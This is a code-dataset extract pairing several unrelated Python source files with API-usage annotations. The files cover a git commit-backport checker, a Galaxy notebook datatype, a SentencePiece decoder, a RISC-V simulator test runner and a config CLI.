code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
|---|---|---|
"""Init file of source folder """
import logging.config
import yaml
import os
CURR_DIR = os.path.abspath(os.path.dirname(__file__))
LOG_CONFIG_PATH = os.path.join(CURR_DIR, "..", "cfg", "log_config.yaml")
FIXTURE_PATH = os.path.join(CURR_DIR, "..", "fixtures", "test_basic.json")
UNIT_TEST_DIR = os.path.join(CURR_DIR, "tests", "unit")
with open(LOG_CONFIG_PATH, "r") as f:
config = yaml.safe_load(f.read())
logging.config.dictConfig(config)
|
[
"os.path.dirname",
"os.path.join"
] |
[((151, 205), 'os.path.join', 'os.path.join', (['CURR_DIR', '""".."""', '"""cfg"""', '"""log_config.yaml"""'], {}), "(CURR_DIR, '..', 'cfg', 'log_config.yaml')\n", (163, 205), False, 'import os\n'), ((221, 280), 'os.path.join', 'os.path.join', (['CURR_DIR', '""".."""', '"""fixtures"""', '"""test_basic.json"""'], {}), "(CURR_DIR, '..', 'fixtures', 'test_basic.json')\n", (233, 280), False, 'import os\n'), ((297, 336), 'os.path.join', 'os.path.join', (['CURR_DIR', '"""tests"""', '"""unit"""'], {}), "(CURR_DIR, 'tests', 'unit')\n", (309, 336), False, 'import os\n'), ((106, 131), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (121, 131), False, 'import os\n')]
|
#!/usr/bin/env python3
import argparse
import subprocess
import sys
def print_(args: argparse.Namespace, success: bool, message: str) -> None:
"""
Print function with extra coloring when supported and/or requested,
and with a "quiet" switch
"""
COLOR_SUCCESS = '\033[32m'
COLOR_FAILURE = '\033[31m'
COLOR_RESET = '\033[0m'
if args.quiet:
return
if args.color == 'auto':
use_colors = sys.stdout.isatty()
else:
use_colors = args.color == 'always'
s = ''
if use_colors:
if success:
s += COLOR_SUCCESS
else:
s += COLOR_FAILURE
s += message
if use_colors:
s += COLOR_RESET
print(s)
def is_commit_valid(commit: str) -> bool:
ret = subprocess.call(['git', 'cat-file', '-e', commit],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
return ret == 0
def branch_has_commit(upstream: str, branch: str, commit: str) -> bool:
"""
Returns True if the commit is actually present in the branch
"""
ret = subprocess.call(['git', 'merge-base', '--is-ancestor',
commit, upstream + '/' + branch],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
return ret == 0
def branch_has_backport_of_commit(upstream: str, branch: str, commit: str) -> str:
"""
Returns the commit hash if the commit has been backported to the branch,
or an empty string if is hasn't
"""
out = subprocess.check_output(['git', 'log', '--format=%H',
branch + '-branchpoint..' + upstream + '/' + branch,
'--grep', 'cherry picked from commit ' + commit],
stderr=subprocess.DEVNULL)
return out.decode().strip()
def canonicalize_commit(commit: str) -> str:
"""
Takes a commit-ish and returns a commit sha1 if the commit exists
"""
# Make sure input is valid first
if not is_commit_valid(commit):
raise argparse.ArgumentTypeError('invalid commit identifier: ' + commit)
out = subprocess.check_output(['git', 'rev-parse', commit],
stderr=subprocess.DEVNULL)
return out.decode().strip()
def validate_branch(branch: str) -> str:
if '/' not in branch:
raise argparse.ArgumentTypeError('must be in the form `remote/branch`')
out = subprocess.check_output(['git', 'remote', '--verbose'],
stderr=subprocess.DEVNULL)
remotes = out.decode().splitlines()
(upstream, _) = branch.split('/')
valid_remote = False
for line in remotes:
if line.startswith(upstream + '\t'):
valid_remote = True
if not valid_remote:
raise argparse.ArgumentTypeError('Invalid remote: ' + upstream)
if not is_commit_valid(branch):
raise argparse.ArgumentTypeError('Invalid branch: ' + branch)
return branch
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="""
Returns 0 if the commit is present in the branch,
1 if it's not,
and 2 if it couldn't be determined (eg. invalid commit)
""")
parser.add_argument('commit',
type=canonicalize_commit,
help='commit sha1')
parser.add_argument('branch',
type=validate_branch,
help='branch to check, in the form `remote/branch`')
parser.add_argument('--quiet',
action='store_true',
help='suppress all output; exit code can still be used')
parser.add_argument('--color',
choices=['auto', 'always', 'never'],
default='auto',
help='colorize output (default: true if stdout is a terminal)')
args = parser.parse_args()
(upstream, branch) = args.branch.split('/')
if branch_has_commit(upstream, branch, args.commit):
print_(args, True, 'Commit ' + args.commit + ' is in branch ' + branch)
exit(0)
backport = branch_has_backport_of_commit(upstream, branch, args.commit)
if backport:
print_(args, True,
'Commit ' + args.commit + ' was backported to branch ' + branch + ' as commit ' + backport)
exit(0)
print_(args, False, 'Commit ' + args.commit + ' is NOT in branch ' + branch)
exit(1)
|
[
"argparse.ArgumentParser",
"subprocess.check_output",
"sys.stdout.isatty",
"subprocess.call",
"argparse.ArgumentTypeError"
] |
[((773, 882), 'subprocess.call', 'subprocess.call', (["['git', 'cat-file', '-e', commit]"], {'stdout': 'subprocess.DEVNULL', 'stderr': 'subprocess.DEVNULL'}), "(['git', 'cat-file', '-e', commit], stdout=subprocess.\n DEVNULL, stderr=subprocess.DEVNULL)\n", (788, 882), False, 'import subprocess\n'), ((1115, 1261), 'subprocess.call', 'subprocess.call', (["['git', 'merge-base', '--is-ancestor', commit, upstream + '/' + branch]"], {'stdout': 'subprocess.DEVNULL', 'stderr': 'subprocess.DEVNULL'}), "(['git', 'merge-base', '--is-ancestor', commit, upstream +\n '/' + branch], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n", (1130, 1261), False, 'import subprocess\n'), ((1581, 1773), 'subprocess.check_output', 'subprocess.check_output', (["['git', 'log', '--format=%H', branch + '-branchpoint..' + upstream + '/' +\n branch, '--grep', 'cherry picked from commit ' + commit]"], {'stderr': 'subprocess.DEVNULL'}), "(['git', 'log', '--format=%H', branch +\n '-branchpoint..' + upstream + '/' + branch, '--grep', \n 'cherry picked from commit ' + commit], stderr=subprocess.DEVNULL)\n", (1604, 1773), False, 'import subprocess\n'), ((2200, 2285), 'subprocess.check_output', 'subprocess.check_output', (["['git', 'rev-parse', commit]"], {'stderr': 'subprocess.DEVNULL'}), "(['git', 'rev-parse', commit], stderr=subprocess.DEVNULL\n )\n", (2223, 2285), False, 'import subprocess\n'), ((2507, 2594), 'subprocess.check_output', 'subprocess.check_output', (["['git', 'remote', '--verbose']"], {'stderr': 'subprocess.DEVNULL'}), "(['git', 'remote', '--verbose'], stderr=subprocess.\n DEVNULL)\n", (2530, 2594), False, 'import subprocess\n'), ((3095, 3286), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""\n Returns 0 if the commit is present in the branch,\n 1 if it\'s not,\n and 2 if it couldn\'t be determined (eg. invalid commit)\n """'}), '(description=\n """\n Returns 0 if the commit is present in the branch,\n 1 if it\'s not,\n and 2 if it couldn\'t be determined (eg. invalid commit)\n """\n )\n', (3118, 3286), False, 'import argparse\n'), ((441, 460), 'sys.stdout.isatty', 'sys.stdout.isatty', ([], {}), '()\n', (458, 460), False, 'import sys\n'), ((2122, 2188), 'argparse.ArgumentTypeError', 'argparse.ArgumentTypeError', (["('invalid commit identifier: ' + commit)"], {}), "('invalid commit identifier: ' + commit)\n", (2148, 2188), False, 'import argparse\n'), ((2430, 2495), 'argparse.ArgumentTypeError', 'argparse.ArgumentTypeError', (['"""must be in the form `remote/branch`"""'], {}), "('must be in the form `remote/branch`')\n", (2456, 2495), False, 'import argparse\n'), ((2869, 2926), 'argparse.ArgumentTypeError', 'argparse.ArgumentTypeError', (["('Invalid remote: ' + upstream)"], {}), "('Invalid remote: ' + upstream)\n", (2895, 2926), False, 'import argparse\n'), ((2978, 3033), 'argparse.ArgumentTypeError', 'argparse.ArgumentTypeError', (["('Invalid branch: ' + branch)"], {}), "('Invalid branch: ' + branch)\n", (3004, 3033), False, 'import argparse\n')]
|
# -*- coding: utf-8 -*-
#from galaxy.datatypes.json_datatyp import Json as JsonClass
from galaxy.datatypes.data import Text
from galaxy.datatypes.data import get_file_peek
from galaxy import util
import subprocess
import tempfile
import logging
import json
import os
log = logging.getLogger(__name__)
#class Ipynb( JsonClass ):
class Ipynb( Text ):
file_ext = "ipynb"
def set_peek( self, dataset, is_multi_byte=False ):
if not dataset.dataset.purged:
dataset.peek = get_file_peek( dataset.file_name, is_multi_byte=is_multi_byte )
dataset.blurb = "IPython Notebook"
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disc'
def sniff( self, filename ):
"""
Try to load the string with the json module. If successful it's a json file.
"""
try:
ipynb = json.load( open(filename) )
if ipynb.get('nbformat', False) != False and ipynb.get('metadata', False):
return True
else:
return False
except Exception:
return False
def display_data(self, trans, dataset, preview=False, filename=None, to_ext=None, chunk=None, **kwd):
preview = util.string_as_bool( preview )
if chunk:
return self.get_chunk(trans, dataset, chunk)
elif to_ext or not preview:
return self._serve_raw(trans, dataset, to_ext)
else:
ofile_handle = tempfile.NamedTemporaryFile(delete=False)
ofilename = ofile_handle.name
ofile_handle.close()
try:
cmd = 'ipython nbconvert --to html --template basic %s --output %s' % (dataset.file_name, ofilename)
subprocess.call(cmd, shell=True)
ofilename = '%s.html' % ofilename
except Exception:
ofilename = dataset.file_name
log.exception( 'Command "%s" failed. Could not convert the IPython Notebook to HTML, defaulting to plain text.' % cmd )
return open( ofilename )
def set_meta( self, dataset, **kwd ):
"""
Set the number of models in dataset.
"""
pass
|
[
"tempfile.NamedTemporaryFile",
"galaxy.datatypes.data.get_file_peek",
"galaxy.util.string_as_bool",
"subprocess.call",
"logging.getLogger"
] |
[((287, 314), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (304, 314), False, 'import logging\n'), ((1310, 1338), 'galaxy.util.string_as_bool', 'util.string_as_bool', (['preview'], {}), '(preview)\n', (1329, 1338), False, 'from galaxy import util\n'), ((518, 579), 'galaxy.datatypes.data.get_file_peek', 'get_file_peek', (['dataset.file_name'], {'is_multi_byte': 'is_multi_byte'}), '(dataset.file_name, is_multi_byte=is_multi_byte)\n', (531, 579), False, 'from galaxy.datatypes.data import get_file_peek\n'), ((1558, 1599), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'delete': '(False)'}), '(delete=False)\n', (1585, 1599), False, 'import tempfile\n'), ((1830, 1862), 'subprocess.call', 'subprocess.call', (['cmd'], {'shell': '(True)'}), '(cmd, shell=True)\n', (1845, 1862), False, 'import subprocess\n')]
|
from SpmTextEncoder import SpmTextEncoder
import sys
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='decoder')
parser.add_argument("--model", type=str, help="path to model(indices)")
args = parser.parse_args()
spm = SpmTextEncoder(args.model)
for line in sys.stdin:
sys.stdout.write(spm.decode(list(map(int, line.strip().split()))))
sys.stdout.write("\n")
"""
cat ~/nmt/sample_idx.txt | python decode.py --model \
~/nmt/t2t_data_enzh_encoder/vocab.translatespm_enzh_ai50k.50000.subwords.en.model
"""
|
[
"sys.stdout.write",
"SpmTextEncoder.SpmTextEncoder",
"argparse.ArgumentParser"
] |
[((112, 158), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""decoder"""'}), "(description='decoder')\n", (135, 158), False, 'import argparse\n'), ((276, 302), 'SpmTextEncoder.SpmTextEncoder', 'SpmTextEncoder', (['args.model'], {}), '(args.model)\n', (290, 302), False, 'from SpmTextEncoder import SpmTextEncoder\n'), ((414, 436), 'sys.stdout.write', 'sys.stdout.write', (['"""\n"""'], {}), "('\\n')\n", (430, 436), False, 'import sys\n')]
|
#!/usr/bin/env python3
import os
import numpy as np
import jax.numpy as jnp
from multiprocessing import Pool, Manager, Condition, Value, Process
import sys
import io
import time
import yaml
import re
import traceback
import subprocess
from .utils import *
from rich.progress import (
Progress,
TextColumn,
BarColumn,
TimeElapsedColumn,
TimeRemainingColumn
)
def sync_variable():
# to synchronize the runner processes with the main process
globals()["manager"] = Manager()
globals()["result_dict"] = manager.dict()
globals()["result_condition"] = Condition()
globals()["result_detail_dict"] = manager.dict()
globals()["tests"] = Value('L', 0)
globals()["fails"] = Value('L', 0)
# run failed cases last time
def get_retry_cases():
print("retry last failed cases...")
if os.access('log/runner_report.log', os.R_OK):
with open('log/runner_report.log') as fp:
cases = []
lines = fp.read().splitlines()
for line in lines:
if line.startswith('PASS '):
continue
cases.append(line.replace('FAIL ', ''))
return cases
if len(cases) == 0:
print('all pass, retry abort.')
sys.exit(0)
else:
print('could not retry without last run log.')
sys.exit(-1)
# get cases from arguments
def get_arg_cases(args_cases):
s = lambda l: l.strip()
f = lambda l: l != '' and not l.startswith('#')
if os.access(args_cases, os.R_OK):
with open(args_cases) as fp:
cases = list(filter(f, map(s, fp.read().splitlines())))
elif args_cases != '':
cases = list(filter(f, map(s, args_cases.split(','))))
else:
cases = []
return cases
def get_generator_case():
with open("log/generator_case.log") as fp:
s = lambda l: l.strip()
f = lambda l: l != '' and not l.startswith('#')
generator_info_list = list(filter(f, map(s, fp.read().splitlines())))
generator_case_list = []
generator_num_list = []
for no in range(len(generator_info_list)):
[case_name, case_num] = re.split(r'\s*,\s*', generator_info_list[no])
generator_case_list.append(case_name)
generator_num_list.append(int(case_num))
return [generator_case_list, generator_num_list]
def select_run_case( generator_case_list, generator_num_list, cases ):
total_num = 0
run_case_list = []
if len(cases) > 0:
for no in range(len(generator_case_list)):
case_name = generator_case_list[no]
for case in cases:
if not case in case_name:
continue
run_case_list.append(case_name)
total_num += generator_num_list[no]
break
else:
run_case_list = generator_case_list
total_num = sum(generator_num_list)
return [run_case_list, total_num]
def process_bar_setup( total_num ):
# progress bar configurations
progress = Progress(
TextColumn("[bold blue]{task.fields[name]}"),
BarColumn(bar_width=None),
"[progress.percentage]{task.percentage:>3.1f}%",
"case_sum:",
TextColumn("[bold red]{task.total}"),
"elapsed:",
TimeElapsedColumn(),
"remaining:",
TimeRemainingColumn()
)
progress.start()
task_id = progress.add_task("runner", name = "runner", total=total_num, start=True)
return [progress, task_id]
def runner_error(case):
with result_condition:
result_dict[case] = "python run failed."
result_detail_dict[case] = ''
with open(f'build/{case}/runner.log', 'w') as f:
f.write( result_dict[case] + '\n' + result_detail_dict[case] + '\n' )
def runner_callback(progress, task_id, completed, total):
progress.update( task_id, completed = completed )
def gen_runner_report( ps, args, generator_case_list, generator_num_list ):
failed_num = 0
# save the runner result into the log file
report = open(f'log/runner_report.log', 'w')
for case, p in ps:
ok = True
p_str = p.get().getvalue()
# find case result in result_dict
if result_dict[case] != "ok":
reason = result_dict[case]
ok = False
if p_str != '':
with open(f'build/{case}/runner.log', 'w') as f:
f.write(p_str)
if not ok:
failed_num += 1
if args.failing_info:
time.sleep(0.5)
print(f'FAIL {case} - {reason}')
report.write(f'FAIL {case} - {reason}\n')
else:
report.write(f'PASS {case}\n')
report.close()
return failed_num
# the main entrance of the runner process, including run in simulators and check the data
def run_test(case, args):
try:
stdout = sys.stdout
stderr = sys.stderr
output = io.StringIO()
sys.stdout = output
sys.stderr = output
# file information
binary = f'build/{case}/test.elf'
run_mem = f'build/{case}/run.mem'
run_log = f'build/{case}/spike.log'
res_file = f'build/{case}/spike.sig'
check_golden = f'build/{case}/check_golden.npy'
# get the cases list in the case, including test_num, name, check string, golden
case_list = np.load( check_golden, allow_pickle=True )
# run elf in spike to check if the elf is right
ret = spike_run(args, run_mem, binary, run_log, res_file)
if ret != 0:
# if failed, set the result of every case as spike-run, means failed when run in spike
# then return, stop testing this case
with result_condition:
result_dict[case] = "spike-run"
result_detail_dict[case] = f'\nspike-run failed!!!\nPlease check the spike log in {run_log} '
fails.value += len(case_list)
tests.value += len(case_list)
with open(f'build/{case}/runner.log', 'w') as f:
f.write( result_dict[case] + '\n' + result_detail_dict[case] + '\n' )
sys.stdout = stdout
sys.stderr = stderr
return output
# use these two variables to keep test info for this case
test_result = ''
test_detail = ''
# use this to count failed subcases in this case
failed_case_list = []
# check the golden result computed by python with the spike result
spike_result = {}
start_dict = {}
read_elf_cmd = args.config['compile']['readelf'] + ' -s ' + binary
try:
addr_begin_sig_str = str( subprocess.check_output( read_elf_cmd + ' | grep begin_signature ', shell=True ), encoding = 'utf-8' )
addr_begin_sig = int( addr_begin_sig_str.split()[1], 16 )
flag_begin_sig = True
except:
flag_begin_sig = False
for test_case in case_list:
if test_case["check_str"] != '':
# when test["check_str"] == 0, no need to check
if flag_begin_sig:
try:
addr_testdata_str = str( subprocess.check_output( read_elf_cmd + f' | grep test_{test_case["no"]}_data ', shell=True ), encoding = 'utf-8' )
addr_testdata = int( addr_testdata_str.split()[1], 16 )
except:
test_result += test_case["name"]+f'_faild_find_{test_case["no"]}_test_data-'
test_detail += f"Can't find symbol test_{test_case['no']}_data, please check build/{case}/test.map.\n"
failed_case_list.append(test_case["name"])
continue
golden = test_case["golden"] = copy_to_dtype( test_case["golden_data"], eval(f'jnp.{test_case["golden_dtype"]}') )
#because many subcases in one signature file, so we need the spike_start to know where to find the result
result = from_txt( res_file, golden, addr_testdata - addr_begin_sig )
start_dict[test_case["name"]] = addr_testdata - addr_begin_sig
spike_result[test_case["name"]] = result
#save the python golden result and spike result into check.data file of each case
os.makedirs(f'build/{test_case["name"]}', exist_ok=True)
check_result = check_to_txt( golden, result, f'build/{test_case["name"]}/check.data', test_case["check_str"] )
if not check_result:
# if check failed, set result as "check failed", because the elf can be run in more sims, so don't use result_dict and notify result_condition
test_result += test_case["name"]+"_check failed-"
test_detail += f'The python golden data and spike results of test case {test_case["no"]} in build/{case}/test.S check failed. You can find the data in build/{test_case["name"]}/check.data\n'
failed_case_list.append(test_case["name"])
else:
test_result += test_case["name"]+"_faild_find_begin_signature"
test_detail += f"Can't find symbol begin_signature, please check build/{case}/test.map.\n"
failed_case_list.append(test_case["name"])
# run case in more simulators and compare simulator results with spike results, which need to be same
sims_result = sims_run( args, f'build/{case}', binary )
for sim in [ "vcs", "verilator", "gem5" ]:
if args.config[sim]['path'] == None:
# don't set the path of sim, so dont't run it and needn't judge the result
continue
if sims_result[sim] != 0:
# sim run failed
# because the elf maybe can be run in more sims, so don't use result_dict and notify result_condition
test_result += sim + "_failed-"
test_detail += f'{binary} runned unsuccessfully in {sim}, please check build/{case}/{sim}.log\n'
failed_case_list = case_list
else:
# sim run successfully, so we compare the sim results with spike results
for test_case in case_list:
if test_case["check_str"] != '':
golden = test_case["golden"]
# get sim result, because many cases in one signature file, so we need the start to know where to find the result
if test_case["name"] in start_dict.keys():
result = from_txt( f'build/{case}/{sim}.sig', golden, start_dict[test_case["name"]] )
else:
test_result += test_case["name"] + '_' + sim + f"_failed_find_{test_case['no']}_start-"
test_detail_dict = f"Can't find test case {test_case['no']} start addr computed when check golden and spike result in build/{case}/test.S, please verify that.\n"
# maybe check failed or other sim failed either so we have this judge s
if test_case["name"] not in failed_case_list:
failed_case_list.append(test_case["name"])
continue
# save the spike result and sim result into diff-sim.data
os.makedirs(f'build/{test_case["name"]}', exist_ok=True)
diff_result = diff_to_txt( spike_result[test_case["name"]], result, f'build/{test_case["name"]}/diff-{sim}.data', "spike", sim )
if not diff_result:
# if spike result don't equal with sim result, diff failed, write 'sim_diff failed' to test_result
test_result += test_case["name"] + '_' + sim + "_diff failed-"
test_detail_dict = f'The results of spike and {sim} of test case {test_case["no"]}in build/{case}/test.S check failed. You can find the data in build/{test_case["name"]}/diff-{sim}.data\n'
# maybe check failed or other sim failed either so we have this judge
if test_case["name"] not in failed_case_list:
failed_case_list.append(test_case["name"])
with result_condition:
if test_result == '':
result_dict[case] = "ok"
result_detail_dict[case] = ''
tests.value += len(case_list)
else:
result_dict[case] = test_result
result_detail_dict[case] = test_detail
fails.value += len(failed_case_list)
tests.value += len(case_list)
with open(f'build/{case}/runner.log', 'w') as f:
f.write( result_dict[case] + '\n' + result_detail_dict[case] + '\n' )
sys.stdout = stdout
sys.stderr = stderr
return output
except:
if output in locals().keys():
sys.stdout = stdout
sys.stderr = stderr
else:
output = io.StringIO()
result_dict[case] = 'python failed'
error_output = io.StringIO()
traceback.print_tb(sys.exc_info()[2], file=error_output)
error_str = error_output.getvalue()
error_str += "\nUnexpected error: " + str(sys.exc_info()[0]) + " " + str(sys.exc_info()[1])
result_detail_dict[case] = error_str
with open(f'build/{case}/runner.log', 'w') as f:
f.write( result_dict[case] + '\n' + result_detail_dict[case] + '\n' )
# print(error_str)
return output
def main(args):
try:
# define some global sync variables to synchronize the runner processes with the main process
sync_variable()
if args.retry:
cases = get_retry_cases()
else:
cases = get_arg_cases(args.cases)
print("looking for the cases...")
[generator_case_list, generator_num_list] = get_generator_case()
[run_case_list, total_num] = select_run_case( generator_case_list, generator_num_list, cases )
[progress, task_id] = process_bar_setup( total_num )
ps = []
with Pool(processes=args.nproc) as pool:
for case in run_case_list:
res = pool.apply_async(run_test, [ case, args ],
callback=lambda _: runner_callback( progress, task_id, tests.value, total_num ),
error_callback=lambda _: runner_error(case) )
ps.append((case, res))
failed_num = gen_runner_report( ps, args, generator_case_list, generator_num_list )
progress.stop()
# spike may make that user can't input in command line, use stty sane to fix that.
os.system("stty sane")
if failed_num == 0:
print(f'{len(ps)} files running finish, all pass.( {tests.value} tests )')
sys.exit(0)
else:
if args.failing_info:
print(f'{len(ps)} files running finish, {failed_num} failed.( {tests.value} tests, {fails.value} failed.)')
else:
print(f'{len(ps)} files running finish, {failed_num} failed.( {tests.value} tests, {fails.value} failed, please look at the log/runner_report.log for the failing information. )')
sys.exit(-1)
except KeyboardInterrupt:
if 'pool' in locals():
pool.close()
pool.join()
if 'progress' in locals():
progress.stop()
print("Catch KeyboardInterrupt!")
os.system("stty sane")
sys.exit(-1)
if __name__ == "__main__":
main()
|
[
"io.StringIO",
"numpy.load",
"re.split",
"rich.progress.TextColumn",
"os.makedirs",
"multiprocessing.Manager",
"subprocess.check_output",
"multiprocessing.Value",
"rich.progress.TimeElapsedColumn",
"multiprocessing.Condition",
"os.system",
"rich.progress.BarColumn",
"time.sleep",
"rich.progress.TimeRemainingColumn",
"sys.exc_info",
"multiprocessing.Pool",
"os.access",
"sys.exit"
] |
[((494, 503), 'multiprocessing.Manager', 'Manager', ([], {}), '()\n', (501, 503), False, 'from multiprocessing import Pool, Manager, Condition, Value, Process\n'), ((586, 597), 'multiprocessing.Condition', 'Condition', ([], {}), '()\n', (595, 597), False, 'from multiprocessing import Pool, Manager, Condition, Value, Process\n'), ((676, 689), 'multiprocessing.Value', 'Value', (['"""L"""', '(0)'], {}), "('L', 0)\n", (681, 689), False, 'from multiprocessing import Pool, Manager, Condition, Value, Process\n'), ((715, 728), 'multiprocessing.Value', 'Value', (['"""L"""', '(0)'], {}), "('L', 0)\n", (720, 728), False, 'from multiprocessing import Pool, Manager, Condition, Value, Process\n'), ((829, 872), 'os.access', 'os.access', (['"""log/runner_report.log"""', 'os.R_OK'], {}), "('log/runner_report.log', os.R_OK)\n", (838, 872), False, 'import os\n'), ((1529, 1559), 'os.access', 'os.access', (['args_cases', 'os.R_OK'], {}), '(args_cases, os.R_OK)\n', (1538, 1559), False, 'import os\n'), ((1370, 1382), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (1378, 1382), False, 'import sys\n'), ((3111, 3155), 'rich.progress.TextColumn', 'TextColumn', (['"""[bold blue]{task.fields[name]}"""'], {}), "('[bold blue]{task.fields[name]}')\n", (3121, 3155), False, 'from rich.progress import Progress, TextColumn, BarColumn, TimeElapsedColumn, TimeRemainingColumn\n'), ((3165, 3190), 'rich.progress.BarColumn', 'BarColumn', ([], {'bar_width': 'None'}), '(bar_width=None)\n', (3174, 3190), False, 'from rich.progress import Progress, TextColumn, BarColumn, TimeElapsedColumn, TimeRemainingColumn\n'), ((3278, 3314), 'rich.progress.TextColumn', 'TextColumn', (['"""[bold red]{task.total}"""'], {}), "('[bold red]{task.total}')\n", (3288, 3314), False, 'from rich.progress import Progress, TextColumn, BarColumn, TimeElapsedColumn, TimeRemainingColumn\n'), ((3344, 3363), 'rich.progress.TimeElapsedColumn', 'TimeElapsedColumn', ([], {}), '()\n', (3361, 3363), False, 'from rich.progress import Progress, TextColumn, BarColumn, TimeElapsedColumn, TimeRemainingColumn\n'), ((3395, 3416), 'rich.progress.TimeRemainingColumn', 'TimeRemainingColumn', ([], {}), '()\n', (3414, 3416), False, 'from rich.progress import Progress, TextColumn, BarColumn, TimeElapsedColumn, TimeRemainingColumn\n'), ((5072, 5085), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (5083, 5085), False, 'import io\n'), ((5529, 5569), 'numpy.load', 'np.load', (['check_golden'], {'allow_pickle': '(True)'}), '(check_golden, allow_pickle=True)\n', (5536, 5569), True, 'import numpy as np\n'), ((2202, 2248), 're.split', 're.split', (['"""\\\\s*,\\\\s*"""', 'generator_info_list[no]'], {}), "('\\\\s*,\\\\s*', generator_info_list[no])\n", (2210, 2248), False, 'import re\n'), ((13770, 13783), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (13781, 13783), False, 'import io\n'), ((14833, 14859), 'multiprocessing.Pool', 'Pool', ([], {'processes': 'args.nproc'}), '(processes=args.nproc)\n', (14837, 14859), False, 'from multiprocessing import Pool, Manager, Condition, Value, Process\n'), ((15438, 15460), 'os.system', 'os.system', (['"""stty sane"""'], {}), "('stty sane')\n", (15447, 15460), False, 'import os\n'), ((16353, 16375), 'os.system', 'os.system', (['"""stty sane"""'], {}), "('stty sane')\n", (16362, 16375), False, 'import os\n'), ((16384, 16396), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (16392, 16396), False, 'import sys\n'), ((1285, 1296), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1293, 1296), False, 'import sys\n'), ((4637, 4652), 'time.sleep', 'time.sleep', (['(0.5)'], {}), '(0.5)\n', (4647, 4652), False, 'import time\n'), ((6887, 6965), 'subprocess.check_output', 'subprocess.check_output', (["(read_elf_cmd + ' | grep begin_signature ')"], {'shell': '(True)'}), "(read_elf_cmd + ' | grep begin_signature ', shell=True)\n", (6910, 6965), False, 'import subprocess\n'), ((13687, 13700), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (13698, 13700), False, 'import io\n'), ((15601, 15612), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (15609, 15612), False, 'import sys\n'), ((16085, 16097), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (16093, 16097), False, 'import sys\n'), ((8590, 8646), 'os.makedirs', 'os.makedirs', (['f"""build/{test_case[\'name\']}"""'], {'exist_ok': '(True)'}), '(f"build/{test_case[\'name\']}", exist_ok=True)\n', (8601, 8646), False, 'import os\n'), ((13811, 13825), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (13823, 13825), False, 'import sys\n'), ((11891, 11947), 'os.makedirs', 'os.makedirs', (['f"""build/{test_case[\'name\']}"""'], {'exist_ok': '(True)'}), '(f"build/{test_case[\'name\']}", exist_ok=True)\n', (11902, 11947), False, 'import os\n'), ((13974, 13988), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (13986, 13988), False, 'import sys\n'), ((7409, 7504), 'subprocess.check_output', 'subprocess.check_output', (['(read_elf_cmd + f" | grep test_{test_case[\'no\']}_data ")'], {'shell': '(True)'}), '(read_elf_cmd +\n f" | grep test_{test_case[\'no\']}_data ", shell=True)\n', (7432, 7504), False, 'import subprocess\n'), ((13943, 13957), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (13955, 13957), False, 'import sys\n')]
|
"""
Command Line Interface for PADRE.
"""
import click
from pypadre.pod.app import PadreConfig
from pypadre.pod.app.padre_app import PadreAppFactory
@click.group()
def config():
"""
Commands for the configuration.
Default config file: ~/.padre.cfg
"""
def _get_app(ctx) -> PadreConfig:
return ctx.obj["config-app"]
@config.command(name="get")
@click.option('--param', default=None, help='Get value of given param')
@click.option('--section', default=None, help='Get value from given section')
@click.pass_context
def get(ctx, param, section):
"""
commands for the configuration
Default config file: ~/.padre.cfg
"""
if section is None:
result = _get_app(ctx).get(param)
else:
result = _get_app(ctx).get(param, section=section)
print(result)
@config.command(name="set")
@click.option('--param', nargs=2, default=None, help='key value pair as tuple')
@click.option('--section', default=None, help='Set key, value for given section')
@click.pass_context
def set_config_param(ctx, param, section):
"""
Sets key, value in config. param must be a tuple
"""
if section is None:
_get_app(ctx).set(param[0], param[1])
else:
_get_app(ctx).set(param[0], param[1], section)
_get_app(ctx).save()
# Reinitialize app with changed configuration
ctx.obj['pypadre-app'] = PadreAppFactory.get(_get_app(ctx))
@config.command(name="list")
@click.option('--section', default=None, help='Get list of params from given section')
@click.pass_context
def list_config_params(ctx, section):
"""
List all values in config
"""
if section is None:
result = _get_app(ctx).config['GENERAL'].keys()
else:
result = _get_app(ctx).config[section].keys()
print(result)
|
[
"click.group",
"click.option"
] |
[((154, 167), 'click.group', 'click.group', ([], {}), '()\n', (165, 167), False, 'import click\n'), ((373, 443), 'click.option', 'click.option', (['"""--param"""'], {'default': 'None', 'help': '"""Get value of given param"""'}), "('--param', default=None, help='Get value of given param')\n", (385, 443), False, 'import click\n'), ((445, 521), 'click.option', 'click.option', (['"""--section"""'], {'default': 'None', 'help': '"""Get value from given section"""'}), "('--section', default=None, help='Get value from given section')\n", (457, 521), False, 'import click\n'), ((846, 924), 'click.option', 'click.option', (['"""--param"""'], {'nargs': '(2)', 'default': 'None', 'help': '"""key value pair as tuple"""'}), "('--param', nargs=2, default=None, help='key value pair as tuple')\n", (858, 924), False, 'import click\n'), ((926, 1011), 'click.option', 'click.option', (['"""--section"""'], {'default': 'None', 'help': '"""Set key, value for given section"""'}), "('--section', default=None, help='Set key, value for given section'\n )\n", (938, 1011), False, 'import click\n'), ((1446, 1536), 'click.option', 'click.option', (['"""--section"""'], {'default': 'None', 'help': '"""Get list of params from given section"""'}), "('--section', default=None, help=\n 'Get list of params from given section')\n", (1458, 1536), False, 'import click\n')]
|
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
